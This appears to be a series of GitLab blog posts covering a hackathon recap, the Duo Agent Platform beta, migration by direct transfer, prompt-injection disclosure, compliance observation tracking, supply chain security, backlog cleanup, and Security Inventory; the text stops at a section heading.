Agent Anansi, a name evoking the clever and resourceful spider from folklore, appears to be a versatile AI agent designed to enhance various GitLab workflows beyond the confines of CI/CD. GitLab's broader vision for AI agents includes systems that mirror familiar team roles and serve as foundational building blocks for highly customized agents. This intelligent companion is poised to enhance GitLab workflows by automating repetitive tasks like issue categorization, optimizing search functions, and performing intelligent data analysis. Similar to GitLab Duo's Chat Agent, Anansi could process natural language requests for information or debugging assistance. A compelling application could be an "AI mentor" suggesting personalized learning paths. The overall impact on collaboration and efficiency would be substantial, improving developer experience by minimizing manual tasks and reducing context-switching. It would also enhance collaboration by providing instant access to documentation and enabling direct actions through intelligent interaction. Agent Anansi functions as a personalized productivity co-pilot, moving beyond generic tool assistance to a truly personalized experience that increases individual developer efficiency and reduces cognitive load.

A fantastic example of AI making daily development work smarter and more intuitive.

The power of partnership: Google Cloud, MongoDB, and GitLab fuel innovation

The AI in Action Hackathon underscored the potency of strategic partnerships in driving innovation. Google Cloud served as a foundational pillar, providing its advanced AI tools, machine learning capabilities, and extensive cloud computing resources as the bedrock for all hackathon projects. MongoDB offered the indispensable intelligent data layer, and GitLab provided the DevSecOps platform essential for building, securing, and deploying these sophisticated AI-enabled applications. Participants were granted access to these powerful tools through free trials or credits, reducing the barriers for experimentation.

The collaborative synergy among these partners was unmistakable in the multipartner structure of the hackathon. This environment allowed participants to explore a wide array of technologies and integration possibilities, enabling them to create innovative projects that addressed real-world problems.

Getting to know GitLab's Duo Agent Platform

GitLab is reimagining software development, charting a future where humans and AI collaborate seamlessly. GitLab Duo Agent Platform allows users to build, customize, and connect AI agents to match their workflow. Developers are empowered to focus on strategic, creative challenges, as AI agents adeptly manage routine tasks such as providing project status updates, bug fixes, and code reviews concurrently.

Duo Agent Platform is now in public beta for GitLab Premium and Ultimate customers on GitLab.com and self-managed environments.

AI agents on the platform leverage comprehensive context from your GitLab projects, code, and requirements. They can also interoperate with other applications or data sources for expanded context and actionable assistance. The platform delivers extensible, customizable agentic AI: Users can create and customize agents and agentic flows that understand their specific work processes and organizational needs. Custom rules can be defined in natural language, ensuring agents perform precisely as configured. A catalog for custom skills, agents, and flows is also planned for future release.

Duo Agent Platform is seamlessly integrated into your workflow, available in your IDE (Integrated Development Environment) or GitLab’s web UI. It currently supports VS Code and the JetBrains family of IDEs, with Visual Studio support planned. This ability to set custom rules for agents, such as specific formatting for code or adherence to language versions, is poised to accelerate reviews and enable swifter deployment of consistent, secure code.

To get started, GitLab.com customers need to activate GitLab Duo beta features for their group, while self-managed customers need to enable these features for their GitLab Self-Managed instance. For those who are not yet GitLab customers, a GitLab Ultimate trial, including Duo Agent Platform, is available at no cost.

Join the AI revolution: What's next for developers

The AI in Action Hackathon vividly showcased the transformative potential of artificial intelligence when applied to real-world software development challenges. For developers inspired by these breakthroughs, the journey into AI-powered DevSecOps has just started. Users are encouraged to explore and harness the power of GitLab Duo, which is engineered to substantially elevate productivity, enhance operational efficiency, and reduce security risks across the software development lifecycle. GitLab Duo offers a suite of integrated features, including intelligent Code Suggestions, an interactive Chat agent, AI-assisted Root Cause Analysis for CI/CD failures, and clear explanations for security vulnerabilities — all directly accessible within the platform.

Beyond utilizing these powerful tools, developers are invited to contribute actively to the vibrant GitLab community. This hackathon is an integral part of GitLab's broader community engagement initiative, which encourages contributions to GitLab's open source community. By contributing, developers can directly shape the platform that millions use to deliver software faster and more securely. As a testament to GitLab's commitment to its community, contributors benefit from the very AI-powered tools, such as GitLab Duo, that they help build. Furthermore, GitLab recognizes and rewards community contributions through various programs, including the monthly Notable Contributor initiative and special recognition for Hackathon winners.

The AI in Action Hackathon showcased how a robust trust infrastructure, combined with emerging AI use cases, is forging a path toward a more trustworthy and efficient digital future. GitLab is dedicated to accelerating the monthly delivery of potent new AI features, with a clear strategic trajectory toward becoming a premier agent orchestration platform. GitLab is poised to empower users to craft, tailor, and disseminate complex agent flows, enabling highly automated and intelligent workflows. The landscape of software development is rapidly transforming, becoming progressively autonomous, adaptive, and AI-driven.

I can’t wait to see what you will build next with GitLab!

Using direct transfer enables you to easily create a copy of chosen GitLab resources on the same or another GitLab instance. You can use either the UI or API. The UI is intuitive and straightforward, while the API gives you additional flexibility in terms of choosing resources to be copied.

Migrating by direct transfer is a major improvement from migrating groups and projects using file exports because of the following:

• You don't need to manually export each individual group and project to a file and then import all those export files to a new location. Now, you can directly migrate any top-level group you have the Owner role for with all its sub-groups and projects.
• It allows for post-import user contribution mapping (such as issue or comment authorship), which gives you greater flexibility and control.
• It works reliably with large projects. Thanks to resource batching and concurrent execution of import and export processes the chance of interruption or timeout is significantly lowered.
• It offers better insights into the migration while it runs as well as after it completes. In the UI you can observe as the numbers grow as more items are imported. Then you can review the results. You can see that an item was imported thanks to an Imported badge on items in the GitLab UI.

We’ve come a long way since GitLab 14.3 when we started supporting the direct migration of the group resources. In GitLab 15.8, we extended this functionality to projects as a beta. Since then, we have worked to improve the efficiency and reliability of importing, especially for large projects. We thoroughly reviewed the feature from a security and instance stability standpoint.

To give an example of the sizes of the groups and projects we've tested with, and their import duration, we've seen successful imports of:

• 100 projects (19.9k issues, 83k merge requests, 100k+ pipelines) that migrated in 8 hours
• 1,926 projects (22k issues, 160k merge requests, 1.1 million pipelines) that migrated in 34 hours

On GitLab.com, migrating by direct transfer is enabled by default. On GitLab Self-Managed and on GitLab Dedicated, an administrator must enable the feature in application settings.

When to use migrating by direct transfer and how to get the best results

Migrating by direct transfer requires network connection between instances or GitLab.com. Therefore, customers that use air-gapped networks with no connectivity between their GitLab instances still have to use file exports to copy their GitLab data. They will be able to use migrating groups and projects by direct transfer after we extend this solution to also support offline instances.

Before you attempt a migration, review documentation, including prerequisites, group items, and project items that are migrated. Some items are excluded from migration or not yet supported.

Migrate between most recent possible versions

We recommend migrating between versions that are as recent as possible. Update the source and destination instances to take advantage of all improvements and bug fixes we’ve added over time.

Prepare for user contribution mapping post migration

Familiarize yourself with user contribution and membership mapping process so you know what to expect after migration completes and what are the next steps for you to take.

Review options to reduce migration duration

Depending on where you’re migrating to, GitLab.com, a self-managed instance, or Dedicated, you can employ various strategies to reduce the migration duration.

How can I review the results?

You can view all groups and projects migrated by you by direct transfer listed on the group import history page. For each group and project, you can view statistics for imported items and dig down into details in case some items were not imported. Alternatively, you can use API endpoints to do the same.

In cases where most of your projects completed successfully but one or two end up missing some relations, like merge requests or issues, we recommend that you try re-importing those projects by using the API.

What’s next for migrating by direct transfer?

We are excited to bring migration by direct transfer to general availability and hope you are too! We want to hear from you. What's the most important missing piece for you? What else can we improve? Let us know in the migration by direct transfer feedback issue and we'll keep iterating!

The AI security challenge

AI-powered platforms create incredible productivity for engineers. However, the ability to create code also brings a crucial need for robust security. For example, prompt injection attacks embed hidden instructions in comments, source code, and merge request descriptions. These can guide AI into making attacker-controlled recommendations to the user or, in some cases, autonomously taking unintended action. Addressing these risks helps ensure the responsible and secure evolution of AI in development.

GitLab’s security and engineering teams work diligently to provide customers with a safe and secure platform. Partnerships with external security researchers, such as Persistent Security, are an integral part of that approach.

Our commitment to transparent collaboration

GitLab's AI Transparency Center details how we uphold ethics and transparency in our development and use of AI-powered features. This commitment extends to our collaboration with security researchers.

When Persistent Security reached out to GitLab to discuss a complex prompt injection issue with industry-wide impact, they were quickly connected to the GitLab Product Security Response Team to investigate if any of our products were affected.

Through this dialogue, we were able to quickly identify and implement mitigations that were deployed prior to the public beta of GitLab Duo Agent Platform in July 2025. This rapid response exemplifies our approach to working with security researchers and collaborating transparently throughout the process to coordinate remediation and disclosure to protect customers.

Why external research matters for AI security

AI systems present unique security challenges that require diverse perspectives and specialized expertise.

External researchers are essential for:

• Rapid Threat Evolution: AI security threats evolve quickly. The research community helps us stay ahead of emerging attack patterns, from prompt injection techniques to novel ways of manipulating AI responses.
• Real-World Testing: External researchers test our systems in ways that mirror actual attacker behavior, providing invaluable insights into how our defenses perform under pressure.
• Diverse Expertise: External security researchers often demonstrate exceptional creativity, with reports standing out for innovative approaches to identifying complex vulnerabilities. This diversity of thinking strengthens our overall security posture.

Our ongoing commitment

The security research community remains a crucial partner in our mission to protect customers. We're committed to:

• Providing clear guidance to researchers about our AI systems and security boundaries
• Maintaining rapid response times for security disclosures
• Sharing our learnings with the broader community through public disclosure and research

The future of AI security depends on collaboration between organizations like GitLab and the security research community. By working together, we can ensure that AI remains a force for productivity and innovation while protecting our customers and users from harm.

To our security research partners: thank you for your partnership, making us stronger, more secure, and better prepared for the challenges ahead. I’ll be at Black Hat August 6-7, 2025, and look forward to connecting with AI security researchers there. You can reach me through the Black Hat mobile app or on LinkedIn.

Do you want to play a role in keeping GitLab secure? Visit our HackerOne program to get started, or learn more about our AI security practices at our AI Transparency Center.

These observations emerge from our quarterly control monitoring process, where we systematically assess the effectiveness of security controls supporting our certifications (SOC 2, ISO 27001, etc.). Observations can also be the output of our external audits from third-party assessors. Observations aren't just compliance checkboxes, they represent real security risks that need prompt, visible remediation.

Observation management is the process by which we manage these observations from identification through remediation to closure. In this article, you'll learn how the GitLab Security Team uses the DevSecOps platform to manage and remediate observations, and the efficiencies we've realized from doing so.

The GitLab observation lifecycle: From identification to resolution

The lifecycle of an observation encompasses the entire process from initial identification by compliance engineers through to completed remediation by remediation owners. This lifecycle enables real-time transparent status reporting and that is easier for all stakeholders to understand and follow.

Here are the stages of the observation lifecycle:

1. Identification

• Compliance engineers identify potential observations during quarterly monitoring.
• Initial validation occurs to confirm the finding represents a genuine control gap.
• Detailed documentation begins immediately in a GitLab issue.
• The root cause of the observation is determined and a remediation plan to address the root cause is established.

2. Validation

• Issue is assigned to the appropriate remediation owner (usually a team lead or department manager).
• Remediation owner reviews and confirms they understand and accept ownership.
• The remediation plan is reviewed, prioritized, and updated collaboratively as needed.

3. In-progress

• Active remediation work begins with clear milestones and deadlines.
• Regular updates are provided through GitLab comments and status changes.
• Collaboration happens transparently where all stakeholders can see progress.

4. Remediated

• Remediation owner marks work complete and provides evidence.
• Issue transitions to compliance review for validation.

5. Resolution

• Compliance engineer verifies exit criteria are met.
• The issue is closed with final documentation.
• Lessons learned are captured for future prevention.

Alternative paths handle blocked work, risk acceptance decisions, and stalled remediation efforts with appropriate escalation workflows. <center><i>Example of observation lifecycle</i></center>

The power of transparency in GitLab

Effective observation management shouldn't require detective work to determine basic information like ownership, status, or priority. Yet most organizations find themselves exactly in this scenario: compliance teams chasing updates, operational teams unaware of their responsibilities, and leadership lacking visibility into real risk exposure until audit season arrives.

The Security Compliance team at GitLab faced these exact problems. Our team initially used a dedicated GRC tool as the single source of truth for outstanding observations, but the lack of visibility to key stakeholders meant minimal remediation actually occurred. The team found themselves spending their time on administrative work, rather than guiding remediation efforts.

Our solution was to move observation management directly into GitLab issues within a dedicated project. This approach transforms observations from compliance issues into visible, actionable work items that integrate naturally into development and operations workflows. Every stakeholder can see what needs attention, collaborate on remediation plans, and track progress in real time, creating the transparency and accountability that traditional tools simply can't deliver.

Smart organization through labels and issue boards

GitLab allows teams to categorize observation issues into multiple organizational views. The Security Compliance team uses the following to categorize observations:

• Workflow: ~workflow::identified, ~workflow::validated, ~workflow::in progress, ~workflow::remediated
• Department: ~dept::engineering, ~dept::security, ~dept::product
• Risk Severity: ~risk::critical, ~risk::high, ~risk::medium, ~risk::low
• System: ~system::gitlab, ~system::gcp, ~system::hr-systems
• Program: ~program::soc2, ~program::iso, ~program::fedramp , ~program::pci

These labels are then leveraged to create issue boards:

• Workflow boards visualize the observation lifecycle stages.
• Department boards show each team's remediation workload.
• Risk-based boards prioritize critical findings requiring immediate attention.
• System boards visualize observations by system.
• Program boards track certification-specific observation resolution.

Labels enable powerful filtering and reporting while supporting automated workflows through our triage bot policies. Please refer to the automation section for more details on our automation strategy.

Automation: Working smarter, not harder

Managing dozens of observations across multiple certifications requires smart automation. The Security Compliance team utilizes the triage bot, which is an open source project hosted in GitLab. The triage bot gem aims to enable project managers to automatically triage issues in GitLab projects or groups based on defined policies. This helps manage issue hygiene so stakeholders can focus their efforts on remediation.

Within the observation management project, we have policies written to ensure there is an assignee on each issue, each issue has required labels, issues are updated every 30 days, and blocked and stalled issues are nudged every 90 days. In addition, a weekly summary issue is created to summarize all the issues out of compliance based on our defined policies. This enables team members to monitor issues efficiently and spend less time on administrative tasks.

Measuring success: Key metrics and reporting

GitLab's raw issue data can be leveraged into actionable intelligence. Organizations can extract meaningful insights from issue creation date, closed date, last updated date, and labels. The following metrics provide a comprehensive view of your observation management effectiveness:

Resolution Efficiency Analysis: Average time from identification to resolution by department and severity

Track issue creation versus close dates across departments and severity levels to identify bottlenecks and measure performance against SLAs. This reveals which teams excel at rapid response and which may need additional resources or process improvements.

Real-Time Risk Assessment: Current risk profile based on open critical and high risk observations

Leverage risk level labels to create dynamic visualizations of your organization's current risk exposure. This provides leadership with an immediate understanding of critical observations requiring urgent attention.

Strategic Resource Allocation: Department-level risk distribution for targeted improvement efforts

Identify which departments are responsible for remediation of the highest-risk observations to prioritize resources, oversight, and projects. This data-driven approach ensures improvement efforts focus where they'll have maximum impact.

Compliance Readiness Monitoring: Certification-specific observation counts and resolution rates

Utilize certification labels to assess audit preparedness and track progress toward compliance goals. This metric provides early warning of potential certification risks and validates remediation efforts.

Accountability Tracking: Overdue remediations

Monitor SLA compliance to ensure observations receive timely attention. This metric highlights systemic delays and enables proactive intervention before minor issues become major problems.

Engagement Health Check: Observation freshness

Track recent activity (updates within 30 days) to ensure observations remain actively managed rather than forgotten. This metric identifies stagnant issues that may require escalation or reassignment.

Advanced strategies: Taking observation management further

Here's what you can do to deepen the impact of observation management in your organization.

Integrate with security tools

Modern observation management extends beyond manual tracking by connecting with your existing security infrastructure. Organizations can configure vulnerability scanners and security monitoring tools to automatically generate observation issues, eliminating manual data entry and ensuring comprehensive coverage.

Apply predictive analytics

Historical observation data becomes a powerful forecasting tool when properly analyzed. Organizations can leverage past remediation patterns to predict future timelines and resource requirements, enabling more accurate project planning and budget allocation. Pattern recognition in observation types reveals systemic vulnerabilities that warrant preventive controls, shifting focus from reactive to proactive risk management. Advanced implementations incorporate multiple data sources into sophisticated risk scoring algorithms that provide nuanced threat assessments and priority rankings.

Customize for stakeholders

Effective observation management recognizes that different roles require different perspectives on the same data. Role-based dashboards deliver tailored views for executives seeking high-level risk summaries, department managers tracking team performance, and individual contributors managing their assigned observations. Automated reporting systems can be configured to match various audience needs and communication preferences, from detailed technical reports to executive briefings. Self-service analytics capabilities empower stakeholders to conduct ad-hoc analysis and generate custom insights without requiring technical expertise or support.

Move from mere compliance to operational excellence

GitLab's approach to observation management represents more than a tool change, it's a fundamental shift from reactive compliance to proactive risk mitigation. By breaking down silos between compliance teams and operational stakeholders, organizations achieve unprecedented visibility while dramatically improving remediation outcomes.

The results are measurable: faster resolution through transparent accountability, active stakeholder collaboration instead of reluctant participation, and continuous audit readiness rather than periodic scrambles. Automated workflows free compliance professionals for strategic work while rich data enables predictive analytics that shift focus from reactive firefighting to proactive prevention.

Most importantly, this approach elevates compliance from burden to strategic enabler. When observations become visible, trackable work items integrated into operational workflows, organizations develop stronger security culture and lasting improvements that extend beyond any single audit cycle. The outcome isn't just regulatory compliance. It's organizational resilience and competitive advantage through superior risk management.

Want to learn more about GitLab's security compliance practices? Check out our Security Compliance Handbook for additional insights and implementation guidance.

Supply chain security isn't just about scanning dependencies. It encompasses the entire journey from code creation to production deployment, including:

• Source security: protect code repositories, managing contributor access, ensuring code integrity
• Build security: secure build environments, preventing tampering during compilation and packaging
• Artifact security: ensure the integrity of containers, packages, and deployment artifacts
• Deployment security: secure the delivery mechanisms and runtime environments
• Tool security: harden the development tools and platforms themselves

The "chain" in supply chain security refers to this interconnected series of steps. A weakness anywhere in the chain can compromise the entire software delivery process.

The 2020 SolarWinds attack illustrates this perfectly. In what became one of the largest supply chain attacks in history, state-sponsored attackers compromised the build pipeline of SolarWinds' Orion network management software. Rather than exploiting a vulnerable dependency or hacking the final application, they injected malicious code during the compilation process itself.

The result was devastating: More than 18,000 organizations, including multiple U.S. government agencies, unknowingly installed backdoored software through normal software updates. The source code was clean, the final application appeared legitimate, but the build process had been weaponized. This attack remained undetected for months, demonstrating how supply chain vulnerabilities can bypass traditional security measures.

Common misconceptions that leave organizations vulnerable

Despite growing awareness of supply chain threats, many organizations remain exposed because they operate under fundamental misunderstandings about what software supply chain security actually entails. These misconceptions create dangerous blind spots:

• Thinking software supply chain security equals dependency scanning
• Focusing only on open source components while ignoring proprietary code risks
• Believing that code signing alone provides sufficient protection
• Assuming that secure coding practices eliminate supply chain risks
• Treating it as a security team problem rather than a development workflow challenge

How AI is changing the game

Just as organizations are grappling with traditional software supply chain security challenges, artificial intelligence (AI) is introducing entirely new attack vectors and amplifying existing ones in unprecedented ways.

AI-powered attacks: More sophisticated, more scalable

Attackers are using AI to automate vulnerability discovery, generate convincing social engineering attacks targeting developers, and systematically analyze public codebases for weaknesses. What once required manual effort can now be done at scale — with precision.

The AI development supply chain introduces new risks

AI is reshaping the entire development lifecycle, but it's also introducing significant security blind spots:

• Model supply chain attacks: Pre-trained models from sources like Hugging Face or GitHub may contain backdoors or poisoned training data.
• Insecure AI-generated code: Developers using AI coding assistants may unknowingly introduce vulnerable patterns or unsafe dependencies.
• Compromised AI toolchains: The infrastructure used to train, deploy, and manage AI models creates a new attack surface.
• Automated reconnaissance: AI enables attackers to scan entire ecosystems to identify high-impact supply chain targets.
• Shadow AI and unsanctioned tools: Developers may integrate external AI tools that haven't been vetted.

The result? AI doesn't just introduce new vulnerabilities, it amplifies the scale and impact of existing ones. Organizations can no longer rely on incremental improvements. The threat landscape is evolving faster than current security practices can adapt.

Why most organizations still struggle

Even organizations that understand supply chain security often fail to act effectively. The statistics reveal a troubling pattern of awareness without corresponding behavior change.

When Colonial Pipeline paid hackers $4.4 million in 2021 to restore operations, or when 18,000 organizations fell victim to the SolarWinds attack, the message was clear: Supply chain vulnerabilities can bring down critical infrastructure and compromise sensitive data at unprecedented scale.

Yet, despite this awareness, most organizations continue with business as usual. The real question isn't whether organizations care about supply chain security — it's why caring alone isn't translating into effective protection.

The answer lies in four critical barriers that prevent effective action:

1. The false economy mindset

Organizations sometimes focus on the cost instead of "what's the most effective approach?" This cost-first thinking creates expensive downstream problems.

2. Skills shortage reality

With organizations averaging 4 security professionals per 100 developers, according to BSIMM research, and 90% of organizations reporting critical cybersecurity skills gaps, according to ISC2, traditional approaches are mathematically impossible to scale.

3. Misaligned organizational incentives

Developer OKRs focus on feature velocity while security teams measure different outcomes. When C-suite priorities emphasize speed-to-market over security posture, friction becomes inevitable.

4. Tool complexity overload

The average enterprise uses 45 cybersecurity tools, with 40% of security alerts being false positives and must coordinate across 19 tools on average for each incident.

These barriers create a vicious cycle: Organizations recognize the threat, invest in security solutions, but implement them in ways that don't drive the desired outcomes.

The true price of supply chain insecurity

Supply chain attacks create risk and expenses that extend far beyond initial remediation. Understanding these hidden multipliers helps explain why prevention is not just preferable – it's essential for business continuity.

Time becomes the enemy

• Average time to identify and contain a supply chain breach: 277 days
• Customer trust rebuilding period: 2-3+ years
• Engineering hours diverted from product development to security remediation

Reputation damage compounds

When attackers compromise your supply chain, they don't just steal data – they undermine the foundation of customer trust. Customer churn rates typically increase 33% post-breach, while partner relationships require costly re-certification processes. Competitive positioning suffers as prospects choose alternatives perceived as "safer."

Regulatory reality bites

The regulatory landscape has fundamentally shifted. GDPR fines now average over $50 million for significant data breaches. The EU's new Cyber Resilience Act mandates supply chain transparency. U.S. federal contractors must provide software bills of materials (SBOMs) for all software purchases — a requirement that's rapidly spreading to private sector procurement.

Operational disruption multiplies

Beyond the direct costs, supply chain attacks create operational chaos such as platform downtime during attack remediation, emergency security audits across entire technology stacks, and legal costs from customer lawsuits and regulatory investigations.

What's wrong with current approaches

Most organizations confuse security activity with security impact. They deploy scanners, generate lengthy reports, and chase teams to address through manual follow-ups. But these efforts often backfire — creating more problems than they solve.

Massive scanning vs. effective protection

Enterprises generate over 10,000 security alerts each month, with the most active generating roughly 150,000 events per day. But 63% of these are false positives or low-priority noise. Security teams become overwhelmed and turn into bottlenecks instead of enablers.

The collaboration breakdown

The most secure organizations don't have the most tools; they have the strongest DevSecOps collaboration. But most current setups make this harder by splitting workflows across incompatible tools, failing to show developers security results in their environment, and offering no shared visibility into risk and business impact.

The path forward

Understanding these challenges is the first step toward building effective supply chain security. The organizations that succeed don't just add more security tools, they fundamentally rethink how security integrates with development workflows. They also review end-to-end software delivery workflows to simplify processes, reduce tools and improve collaboration.

At GitLab, we've seen how integrated DevSecOps platforms can address these challenges by bringing security directly into the development workflow. In our next article in this series, we'll explore how leading organizations are transforming their approach to supply chain security through developer-native solutions, AI-powered automation, and platforms that make security a natural part of building great software.

Learn more about GitLab's software supply chain security capabilities.

GitLab's Product and Engineering teams recently launched the Healthy Backlog Initiative to address this backlog and refine our approach to managing contributed issues going forward.

Issues with ongoing community engagement, recent activity, or a clear strategic alignment will remain open. We'll be closing issues that are no longer relevant, lack community interest, or no longer fit our current product direction.

This focus will lead to increased innovation, better expectation setting, and faster development and delivery cycles of community-contributed capabilities.

What is the Healthy Backlog Initiative?

Over time, the GitLab community has submitted tens of thousands of issues, including bugs, feature requests, and feedback items. Currently, the main GitLab issue tracker contains over 65,000 issues, some are no longer applicable to the platform and others remain relevant today.

Our Healthy Backlog Initiative will cull the backlog and establish a workstream for our Product and Engineering teams to implement a more focused approach to backlog management. They will conduct weekly assessments of the backlog to ensure that we prioritize issues that align with our product strategy and roadmap.

Note: If you believe a closed issue does align with GitLab’s product strategy and roadmap, or if you're actively contributing to the request, we strongly encourage you to comment on the issue with updated context and current details. We are committed to reviewing these updated issues as part of our regular assessment efforts.

How does this change benefit you?

This streamlined approach means direct, tangible improvements for every GitLab user:

• Sharper focus and faster delivery: By narrowing our backlog to strategically aligned features, we can dedicate development resources more effectively. This means you can expect shorter development cycles and more meaningful improvements to your GitLab experience.

• Clearer expectations: We are committed to transparent communication about what's on our roadmap and what isn't, empowering you to make informed decisions about your workflows and contributions.

• Accelerated feedback loops: With a clean backlog, new feedback and feature requests will be reviewed and prioritized more efficiently, reducing overall triage time and ensuring timely issues receive the necessary attention. This creates a more responsive feedback loop for everyone.

This initiative does not diminish the significance of community feedback and contributions. We are taking this action to create clarity around what GitLab Team Members can realistically commit to delivering, and to ensure that all feedback receives proper consideration.

Looking forward

The GitLab Healthy Backlog Initiative reflects our commitment to being transparent and effective stewards of the GitLab platform. By clearly communicating our priorities and focusing our efforts on what we can realistically deliver over the next year, we're better positioned to meet and exceed your expectations.

Your continued participation and feedback help make GitLab stronger. Every comment, merge request, bug report, and feature suggestion contributes to our shared vision. And we’re still rewarding you for that as well, with initiatives like our monthly Notable Contributor program, Swag rewards for leveling up, Hackathon winners, and more, all available through our Contributor Portal.

To learn more about how to contribute to GitLab, visit our community site. To share feedback on this project, please add your comments on the feedback issue in this epic.

Security Inventory gives Application Security teams a centralized, portfolio-wide view of risk and scan coverage across their GitLab groups and projects, helping them identify blind spots and prioritize risk mitigation efforts. Dependency Path visualization equips developers with a clear view of how open source vulnerabilities are introduced through the dependency chain, making it easier to pinpoint the right fix.

Together, these capabilities help security and development teams build more secure applications by providing visibility into where risks exist, context to remediate them, and workflows that support collaboration. Unlike other solutions, this all happens in the same platform developers use to build, review, and deploy software, creating a developer and AppSec experience without the overhead of integrations.

Open source widens the attack surface area

Modern applications heavily rely on open source software. However, open source introduces a significant security risk — components can be outdated, unmaintained, or unknowingly expose vulnerabilities. That's why Software Composition Analysis (SCA) has become a cornerstone of modern AppSec programs.

A key challenge in vulnerability management is effectively managing transitive dependency risk. These components are often buried deep in the dependency chain, making it difficult to trace how a vulnerability was introduced or determine what needs to be updated to fix it. Worse, they account for nearly two-thirds of known open source vulnerabilities. Without clear visibility into the full dependency path, teams are left guessing, delaying remediation and increasing risk.

Transitive dependencies are packages that your application uses indirectly. They're pulled in automatically by the direct dependencies you explicitly include. These nested dependencies can introduce vulnerabilities without the developer ever knowing they're in the project.

This challenge becomes exponentially more difficult at scale. When security teams are responsible for hundreds, or even thousands, of repositories — each with their own dependencies, build pipelines, and owners — answering fundamental questions on application security risk posture becomes challenging. And in an era of growing software supply chain threats, where vulnerabilities can propagate across systems through shared libraries and CI/CD configurations, these blind spots take on even greater consequence.

Security Inventory: Visibility that scales

Security Inventory consolidates risk information across all your groups and projects into a unified view. It highlights which assets are covered by security scans and which aren't. Rather than managing issues in isolation, security teams can assess posture holistically and identify where to focus efforts.

This level of centralization is especially critical for organizations managing a large number of repositories. It allows platform and AppSec teams to understand where risk exists by highlighting unscanned or underprotected projects, but also enables them to take action directly from the interface. Teams can go beyond just awareness to enforcement with the full context and understanding of which applications pose the greatest risk. By turning fragmented insights into a single source of truth, Security Inventory enables organizations to move from reactive issue triage to strategic, data-driven security governance. Learn more by watching Security Inventory in action: <!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/yqo6aJLS9Fw?si=CtYmsF-PLN1UKt83" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Dependency Path visualization: Clarity for effective remediation

Security Inventory shows where the risks are at a high level; Dependency Path visualization shows how to fix them.

When a vulnerability is discovered deep in a dependency chain, identifying the correct fix can be complicated. Most security tools will highlight the affected package but stop short of explaining how it entered the codebase. Developers are left guessing which dependencies are directly introduced and which are pulled in transitively, making it difficult to determine where a change is needed, or worse, applying patches that don't address the root cause.

Our new Dependency Path visualization, sometimes referred to as a dependency graph, displays the full route from a top-level package to the vulnerable component following an SCA scan. This clarity is essential, especially given how pervasive deeply embedded vulnerabilities are in dependency chains. And since it's built into the GitLab workflow, developers gain actionable insight without context switching or guesswork. Security teams can more effectively triage issues while developers get assurance that remediations are addressing root causes.

Mitigate risk with developer-first security

These capabilities are part of GitLab's broader strategy to deliver security within the same platform where code is planned, built, and deployed. By embedding security insights into the DevSecOps workflow, GitLab reduces friction and drives collaboration between development and security teams.

Security Inventory and Dependency Path visualization provide complementary perspectives: the former enables scale-aware oversight, the latter supports precision fixes. This alignment helps teams prioritize what matters most and close gaps without adding new tools or complex integrations.

Get started with Security Inventory and Dependency Path visualization today! Sign up for a free trial of GitLab Ultimate.

Read more

• GitLab 18.2 released

• GitLab security solutions

• A field guide to threat vectors in the sofware supply chain

At GitLab, we are reimagining the future of software engineering as a human and AI collaboration. Where developers focus on solving technical, complex problems and driving innovation, while AI agents handle the routine, repetitive tasks that slow down progress. Where developers are free to explore new ideas in code at much lower cost, bug backlogs are a thing of the past, and users of the software you build enjoy a more usable, reliable, and secure experience. This isn't a distant dream. We're building this reality today, and it is called the GitLab Duo Agent Platform.

What is GitLab Duo Agent Platform?

GitLab Duo Agent Platform is our next-generation DevSecOps orchestration platform designed to unlock asynchronous collaboration between developers and AI agents. It will transform your development workflow from isolated linear processes into dynamic collaboration where specialized AI agents work alongside you and your team on every stage of the software development lifecycle; it will be like having an unlimited team of colleagues at your disposal.

Imagine delegating a complex refactoring task to a Software Developer Agent while simultaneously having a Security Analyst Agent scan for vulnerabilities and a Deep Research Agent analyze progress across your repository history. This all happens in parallel, orchestrated seamlessly within GitLab.

Today, we are announcing the launch of the first public beta of the GitLab Duo Agent Platform for GitLab.com and self-managed GitLab Premium and Ultimate customers. This is just the first in a series of updates that will improve how software gets planned, built, verified, and deployed as we amplify human ingenuity through intelligent automation.

This first beta focuses on unlocking the IDE experience through the GitLab VS Code extension and JetBrains IDEs plug-in; next month, we plan on bringing the Duo Agent Platform experience to the GitLab application and expand our IDE support. Let me share a bit more about our vision for the roadmap between now and general availability, planned for later this year. You can find details about the first beta down below.

Watch this video or read on for what's available now and what's to come. Then, if you're ready to get started with Duo Agent Platform, find out how with the public beta.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101993507?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="GitLab Agent Platform Beta Launch_071625_MP_v2"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

GitLab's unique position as an orchestration platform

GitLab sits at the heart of the development lifecycle as the system of record for engineering teams, orchestrating the entire journey from concept to production for over 50 million registered users, including half of the Fortune 500 across geographies. This includes over 10,000 paying customers across all segments and verticals, including public institutions.

This gives GitLab something no competitor can match: a comprehensive understanding of everything it takes to deliver software. We bring together your project plans, code, test runs, security scans, compliance checks, and CI/CD configurations to not only power your team but also orchestrate collaboration with AI agents you control.

As an intelligent, unified DevSecOps platform, GitLab stores all of the context about your software engineering practice in one place. We will expose this unified data to AI agents via our knowledge graph. Every agent we build has automatic access to this SDLC-connected data set, providing rich context so agents can make informed recommendations and take actions that adhere to your organizational standards.

Here's an example of this advantage in action. Have you ever tried to figure out exactly how a project is going across dozens, if not hundreds, of stories and issues being worked on across all the developers involved? Our Deep Research Agent leverages the GitLab Knowledge Graph and semantic search capabilities to traverse your epic and all related issues, and explore the related codebase and surrounding context. It quickly correlates information across your repositories, merge requests, and deployment history. This delivers critical insights that standalone tools can't match and that would take human developers hours to uncover.

<div style="padding:56.25% 0 0 0;position:relative;"><iframe src="https://player.vimeo.com/video/1101998114?title=0&byline=0&portrait=0&badge=0&autopause=0&player_id=0&app_id=58479" frameborder="0" allow="autoplay; fullscreen; picture-in-picture; clipboard-write; encrypted-media; web-share" referrerpolicy="strict-origin-when-cross-origin" style="position:absolute;top:0;left:0;width:100%;height:100%;" title="Deep Research Demo_071625_MP_v1"></iframe></div><script src="https://player.vimeo.com/api/player.js"></script>

Our strategic evolution from AI features to agent orchestration

